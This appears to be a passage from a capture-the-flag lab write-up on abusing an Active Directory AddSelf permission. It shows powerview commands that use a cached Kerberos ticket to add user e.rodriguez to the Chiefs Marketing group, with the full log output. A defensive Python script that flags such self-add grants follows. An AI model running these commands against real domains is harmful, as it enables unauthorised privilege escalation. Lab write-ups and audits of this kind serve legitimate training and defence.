AddSelf


During domain enumeration with BloodHound, it was identified that the e.rodriguez user has the AddSelf privilege over the Chiefs Marketing group.

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=e.rodriguez@dc01.infiltrator.htb.ccache powerview INFILTRATOR.HTB/@dc01.infiltrator.htb -k --no-pass --dc-ip $IP -ns $IP -q 'Get-DomainObjectAcl "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" -ResolveGUIDs'
 
[...REDACTED...]
 
ObjectDN                    : CN=Chiefs Marketing,CN=Users,DC=infiltrator,DC=htb
ObjectSID                   : S-1-5-21-2606098828-3734741516-3625406802-1111
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : None
AccessMask                  : Self
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT
ObjectAceType               : Add/Remove self as member (bf9679c0-0de6-11d0-a285-00aa003049e2)
InheritanceType             : None
SecurityIdentifier          : E.rodriguez (S-1-5-21-2606098828-3734741516-3625406802-1109)
 
ObjectDN                    : CN=Chiefs Marketing,CN=Users,DC=infiltrator,DC=htb
ObjectSID                   : S-1-5-21-2606098828-3734741516-3625406802-1111
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE
ActiveDirectoryRights       : Self
AccessMask                  : 0x8
InheritanceType             : None
SecurityIdentifier          : E.rodriguez (S-1-5-21-2606098828-3734741516-3625406802-1109)

This can be confirmed with PowerView.

┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ KRB5CCNAME=e.rodriguez@dc01.infiltrator.htb.ccache powerview INFILTRATOR.HTB/@dc01.infiltrator.htb -k --no-pass --dc-ip $IP -ns $IP -q 'Add-DomainGroupMember -Identity "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" -Members e.rodriguez' -d   
Logging directory is set to /home/kali/.powerview/logs/dc01.infiltrator.htb
[2024-09-01 19:08:17] LDAP sign and seal are supported
[2024-09-01 19:08:17] TLS channel binding is supported
[2024-09-01 19:08:17] Authentication: NTLM, User: INFILTRATOR.HTB\
[2024-09-01 19:08:17] Connecting to dc01.infiltrator.htb, Port: 636, SSL: True
[2024-09-01 19:08:17] Using Kerberos Cache: e.rodriguez@dc01.infiltrator.htb.ccache
[2024-09-01 19:08:17] SPN LDAP/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[2024-09-01 19:08:17] AnySPN is True, looking for another suitable SPN
[2024-09-01 19:08:17] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[2024-09-01 19:08:17] Using TGT from cache
[2024-09-01 19:08:17] Username retrieved from CCache: e.rodriguez
[2024-09-01 19:08:17] Trying to connect to KDC at 10.10.11.31:88
[2024-09-01 19:08:17] [Get-DomainObject] Using search base: DC=infiltrator,DC=htb
[2024-09-01 19:08:17] [Get-DomainObject] LDAP search filter: (&(|(samAccountName=E.rodriguez)(name=E.rodriguez)(displayname=E.rodriguez)(objectSid=E.rodriguez)(distinguishedName=E.rodriguez)(dnshostname=E.rodriguez)))
[2024-09-01 19:08:18] [Get-DomainGroup] Using search base: DC=infiltrator,DC=htb
[2024-09-01 19:08:18] [Get-DomainGroup] LDAP search filter: (&(objectCategory=group)(|(|(samAccountName=CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB)(name=CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB)(distinguishedName=CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB))))
[2024-09-01 19:08:18] [Get-DomainObject] Using search base: DC=infiltrator,DC=htb
[2024-09-01 19:08:18] [Get-DomainObject] LDAP search filter: (&(|(samAccountName=e.rodriguez)(name=e.rodriguez)(displayname=e.rodriguez)(objectSid=e.rodriguez)(distinguishedName=e.rodriguez)(dnshostname=e.rodriguez)))
[2024-09-01 19:08:18] User e.rodriguez successfully added to CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB

Using the TGT of the e.rodriguez user, the user is now part of the Chiefs Marketing group.
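
Seen from the defending side, the Get-DomainObjectAcl output above can be screened for self-add grants on a group before anyone uses them. The Python below is an added example, not part of the original write-up or of powerview; the function names, the `expected_sids` allow-list and the third sample record are assumptions made for illustration.

```python
import re

SELF_MEMBERSHIP_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"  # "Add/Remove self as member"
DS_SELF = 0x8  # the "Self" right, shown above as AccessMask 0x8

def parse_records(text):
    """One dict per blank-line-separated 'Key : Value' ACE record."""
    rows = [[l.partition(":") for l in b.splitlines()] for b in re.split(r"\n\s*\n", text)]
    return [{k.strip(): v.strip() for k, sep, v in r if sep} for r in rows]

def self_add_reason(rec):
    """Why this allow ACE lets its trustee add itself to the group, or None."""
    mask = rec.get("AccessMask", "")
    names = {mask, *rec.get("ActiveDirectoryRights", "").replace(" ", "").split(",")}
    numeric = int(mask, 16) if mask.lower().startswith("0x") else 0
    allowed = rec.get("ACEType", "").startswith("ACCESS_ALLOWED")
    if not allowed or ("Self" not in names and not numeric & DS_SELF):
        return None
    object_type = rec.get("ObjectAceType", "").lower()
    if not object_type:
        return "unscoped Self: covers every validated write"
    return "Self scoped to group membership" if SELF_MEMBERSHIP_GUID in object_type else None

def audit(text, expected_sids=frozenset()):
    """(object DN, trustee SID, reason) for each unexpected self-add ACE."""
    findings = []
    for rec in parse_records(text):
        sid = (re.findall(r"S-1-[\d-]+", rec.get("SecurityIdentifier", "")) or ["?"])[0]
        reason = self_add_reason(rec)
        if reason and sid not in expected_sids:
            findings.append((rec.get("ObjectDN"), sid, reason))
    return findings

# Two ACEs trimmed from the output above, plus one constructed read-only ACE.
SAMPLE = """\
ObjectDN : CN=Chiefs Marketing,CN=Users,DC=infiltrator,DC=htb
ACEType : ACCESS_ALLOWED_OBJECT_ACE
AccessMask : Self
ObjectAceType : Add/Remove self as member (bf9679c0-0de6-11d0-a285-00aa003049e2)
SecurityIdentifier : E.rodriguez (S-1-5-21-2606098828-3734741516-3625406802-1109)

ObjectDN : CN=Chiefs Marketing,CN=Users,DC=infiltrator,DC=htb
ACEType : ACCESS_ALLOWED_ACE
AccessMask : 0x8
SecurityIdentifier : E.rodriguez (S-1-5-21-2606098828-3734741516-3625406802-1109)

ACEType : ACCESS_ALLOWED_ACE
AccessMask : 0x10
SecurityIdentifier : Authenticated Users (S-1-5-11)
"""
```

`audit(SAMPLE)` reports both e.rodriguez ACEs; passing the SIDs of the principals that are meant to manage the group as `expected_sids` leaves only the unexpected grants.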